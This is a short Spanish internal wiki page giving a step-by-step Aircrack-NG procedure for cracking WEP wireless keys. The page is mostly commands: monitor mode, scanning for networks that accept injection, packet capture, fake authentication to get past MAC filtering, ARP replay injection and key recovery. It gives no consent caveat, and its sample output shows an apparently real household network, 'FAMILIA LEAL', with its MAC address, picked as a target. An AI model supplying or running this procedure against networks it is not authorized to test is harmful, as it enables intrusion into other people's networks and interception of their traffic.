Tabla de Contenidos

Crack de WEP con Aircrack-NG

Descripción

Entre las redes inalámbricas, aquellas con seguridad WEP son las más vulnerables; existen métodos estadí­sticos para averiguar la clave de cifrado.

Prerequistos

Aircrack-NG instalado, y una tarjeta de red inalámbrica que lo soporte:

http://www.aircrack-ng.org/install.html - Instalación

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers Drivers compatibles

Procedimiento

1. Habilitar interfaz de monitoreo:

 sudo airmon-ng start <interfaz_inalámbrica> <canal_de_monitoreo>

Aquí­ nos dice cuál es la interfaz de monitoreo, normalmente es mon0

2. Buscar Redes que se dejen inyectar

 sudo aireplay-ng -9 <interfaz_de_monitoreo>

 Seleccionar la red que mayor porcentaje de paquetes logre inyectar, y que mayor potencia tenga.

Se recomienda copiar los resultados en un archivo de texto, ya que serán utilizados en los demás pasos. Un ejemplo:

13:54:52  00:19:E0:A5:36:B6 - channel: 6 - 'FAMILIA LEAL'
13:54:53  Ping (min/avg/max): 1.074ms/44.784ms/75.551ms Power: -62.60
13:54:53  30/30: 100%
 

La primera entrada es la MAC Address del Access Point, seguido por el canal en el que se encuentra, y el ESSID de la red. La segunda entrada son los tiempos y la potencia de la red, y por último, la cantidad de paquetes que fueron inyectados.

3. Captura de paquetes (abrir en otra consola)

sudo airodump-ng –channel <canal_de_la_redl> –bssid <MAC_Address_AP> –write <archivo> <interfaz_de_monitoreo>

4. Probar inyectar paquetes en la red elegida:

sudo aireplay-ng -9 -e <essid_red> -a <MAC_Address_AP> <interfaz_de_monitoreo>

5. Verificar si hay filtrado MAC, y autenticación falsa:

sudo aireplay-ng -1 0 -e <essid_red> -a <MAC_Address_AP> -h <MAC_Address_Interfaz_Inalámbrica> <interfaz_de_monitoreo>
si no funciona:
sudo aireplay-ng -1 6000 -o 1 -q 10 -e <essid_red> -a <MAC_Address_AP> -h <MAC_Address_Interfaz_Inalámbrica> <interfaz_de_monitoreo>

6. Probar inyectar paquetes en la red elegida:

sudo aireplay-ng -3 -b <MAC_Address_AP> -h <MAC_Address_Interfaz_Inalámbrica> <interfaz_de_monitoreo>
 

7. Romper la llave:

sudo aircrack-ng -z -b <MAC_Address_AP> test*.cap
 

Problemas

-

Referencias

http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

http://www.aircrack-ng.org/doku.php?id=flowchart

-

FIN

21-Enero-2010 D.F. Madiedo v1.0 Primera version


Advertencia

Este documento es privado y es de u so exclusivo de sus autores y de SKINA TECH. Cualquier uso sin una autorización escrita es contra la ley de derechos de autor y de propiedad intelectual, y será motivo de una acción legal.